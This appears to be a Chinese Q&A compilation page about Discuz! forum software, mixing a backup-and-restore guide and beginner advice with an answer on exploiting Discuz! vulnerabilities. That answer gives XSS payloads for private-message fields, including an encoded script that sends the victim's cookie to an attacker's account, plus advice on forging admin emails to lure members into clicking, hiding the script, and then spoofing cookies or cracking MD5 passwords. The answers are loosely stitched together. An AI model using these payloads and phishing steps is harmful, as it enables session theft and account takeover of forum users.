利用discuz的cve（discuz怎么用）

本文目录一览：

1、如何使用Discuz，后台备份和恢复Discuz，站点数据库
2、目前动网论坛的漏洞有那些？如何利用这些漏洞入侵动网？
3、如何利用discuz创建一个视频种子分享论坛
4、我想利用Discuz!这个平台做一个论坛，但是我现在什么语言也不会，想去报个班，但不是到需要学什么啊
5、如何利用Discuz软件去建论坛

如何使用Discuz，后台备份和恢复Discuz，站点数据库

Discuz!为方便用户备份和恢复数据库，已在后台内置了此功能，易于站长操作。今天在这分享一下Discuz!

x2.5论坛后台数据库的备份和恢复方法，以及备份数据库和恢复数据库要注意的一些细节问题。

一、利用Discuz!后台备份数据库

1、为备份数据完整无误，备份数据前请站长先关闭站点;

2、利用站长权限登录后台——》站长——》数据库——》备份，有两个基本的数据备份类型：“Discuz!

和

UCenter

数据”

和

“自定义备份”;

1)、选择“Discuz!

和

UCenter

数据”，会备份你Discuz!数据库的所有数据表文件;(包括插件等生成的数据表)

2)、选择“自定义备份”，按照要求勾选你要备份的数据表即可。

3、“提交”旁边有一个“更多选项”，用户可以根据自己的需求来设置一下更多选项，不是很懂的用户可以不必点开更多选项设置，保持Discuz!设置的默认值就可以了;下面分析一下更多选项的技巧提示：

1)、MySQL

Dump

的速度比

Discuz!

分卷备份快很多，但需要服务器支持相关的

Shell

权限，同时由于

MySQL

本身的兼容性问题，通常进行备份和恢复的服务器应当具有相同或相近的版本号才能顺利进行。因此

MySQL

Dump

是有风险的：一旦进行备份或恢复操作的服务器其中之一禁止了

Shell，或由于版本兼容性问题导致导入失败，您将无法使用

MySQL

Dump

备份或由备份数据恢复;Discuz!

分卷备份没有此限制;

2)、数据备份选项中的设置，仅供高级用户的特殊用途使用，当您尚未对数据库做全面细致的了解之前，请使用默认参数备份，否则将导致备份数据错误等严重问题;

3)、十六进制方式可以保证备份数据的完整性，但是备份文件会占用更多的空间;

4)、压缩备份文件可以让您的备份文件占用更小的空间。

4、上面选好“数据备份类型”，点击提交就可以开始备份了，备份的数据文件会保存在站点根目录下的data目录的一个backup_XXXXXX文件夹里;

5、备份完数据库后即可重新打开站点。

二、利用Discuz!后台恢复数据库

1、为恢复数据完整无误，恢复数据前请站长先关闭站点;

2、利用站长权限登录后台——》站长——》数据库——》恢复，会看到你各次的数据备份记录，并且有备份时间、备份数据类型等;

3、上传恢复数据库必须的restore.php文件;

1)、恢复数据前请在

Discuz!

X2.5

安装文件目录下utility文件夹内找到

restore.php

文件，然后将

restore.php

文件上传到程序文件夹data目录下;

2)、如果你恢复过数据库，会在根目录生成/data/restore.lock文件，恢复数据功能锁定，如果您确定要恢复数据，请到服务器上删除./data/restore.lock。

利用discuz的cve（discuz怎么用）

目前动网论坛的漏洞有那些？如何利用这些漏洞入侵动网？

在discuz！的发贴、回贴、PM等中的subject都没有经过过滤，所以也可以添加代码。例如 ;fid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用方法：把上述代码放置到img中。适用版本：discuz！2.x discuz！3.x 一种利用discuz！2.0漏洞进行欺骗获得cookie的尝试通过测试XXXFan论坛的PM功能存在一个安全漏洞，具体描述如下： XXXFan的给某个会员发送悄悄的链接如下（假定这个会员名字为XXXFan） ;username=XXXFan 因为论坛程序对会员名字没有进行过滤，而是直接显示在发送到栏目中（TO：），所以可以在名字后面加上script代码。例如 ;username=XXXFan "scriptalert(documents.cookie)/scriptb%20" 上面的链接点击以后首先弹出的是自己的cookie内容。当然我们可以先在自己的站点上构造一个程序来收集cookie，类似于 getcookie.php?cookie= 但是如何来诱使会员点击呢，如果简单的放在论坛上，太容易被识别。所以可以利用discuz论坛程序的另外一个功能，"帖子介绍给朋友"功能。因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版，可以伪造任何人给别人发信，安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信，诱使会员点击我们准备的URL，如果诱使就看自己的手段了，例如可以说"论坛正在测试新功能，请您协助点击上面地址，我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励"等等。因为链接地址是XXXFan的，而且发信人和邮件地址都是XXXFan的官方地址，所以可信度非常高，而且不会留下任何把柄。当然为了更高的安全性，可以在script里的内容加密，以进一步增加隐蔽性。至于得到cookie如何做，可以尝试cookie欺骗或者是暴力破解MD5密码本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz！悄悄话漏洞【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepollfid=2tid=16980pollanswers[]=n （n为选项，从0开始）的方式通过URL来直接投票但是如果n最大选项呢，嘻嘻～照样提交成功，不过增加了一个标题为空的选项效果见： ;sid=dymPEc （那个最后的空白的是我刚加的）该漏洞存在的版本： Discuz!3.X Discuz!2.X(可能，没有测试过） Discuz!的代码漏洞这是接着昨天发现的漏洞所展开的，第一发现者（PK0909)。具体的描述就不说了，下面是一个简单的测试代码。 /Article/UploadFiles/200412/20041225232318260.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22 );var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documents.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] 发现discuz！UT 跨域站点的脚本漏洞－－短消息篇有关跨域站点的脚本漏洞，已经算是非常平成并普遍的漏洞了。有关具体的消息可以参阅：下面针对Discuz、UT论坛程序的悄悄话部分加以说明漏洞适应版本： Discuz1.X Discuz!2.0(0609,0820版) Discuz!3.X UT 1.0 漏洞描述： discuz！给指定会员发送悄悄话使用的是类似 ;username=name 的语句，但是name没有经过过滤直接显示在发送短消息的页面中，这就给偷cookie或者更严重的破坏打开了方便之门。 Discuz!3.X已经改为 ;uid=XXXX 类似的语句，避免了这个漏洞，但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞例 ;username=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] ，上面的例子是显示自己的cookie。（针对Discuz!1.X Discuz!2.X) 显示自己的cookie。（针对Discuz!3.X) UT虽然在主题上经过了过滤，也就是说把%27转换为'；但是其收件人却没有过滤，所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同，但是总的来说都有类似的漏洞）

希望采纳

如何利用discuz创建一个视频种子分享论坛

直接建站就可以啦

直接将种子内容以帖子形式发布

以文章的形式来发布

去应用中心装个资料插件，以资料的形式发布

我想利用Discuz!这个平台做一个论坛，但是我现在什么语言也不会，想去报个班，但不是到需要学什么啊

dz是 php + mysql架构

dz系统对于一般的用户来说系统是比较复杂的，但懂得一些html css js语言和图片处理基础就能对页面模板进行设计和修改，以到达自己想要的显示效果，但是你需要学精css 还要注意浏览器兼容性问题，特别是ie6和其他浏览器显示不兼容的。

再有懂得php语言就能设计出一些插件和修改dz代码进而对其进行二次开发。

php学习起来比较简单，目前网络上也有很多教程，高校很少开php 大多是jsp asp.net。所以php大多是自学的。但是php只是web编程语言也就是控制层（程序员），html css js是显示层（web美工，前端），所以你要系统的了解web原理，如果只是想修改下模板就学习下前端再了解下编程语言就行。如果你要二次开发那就要系统的学习php 数据库和前端等。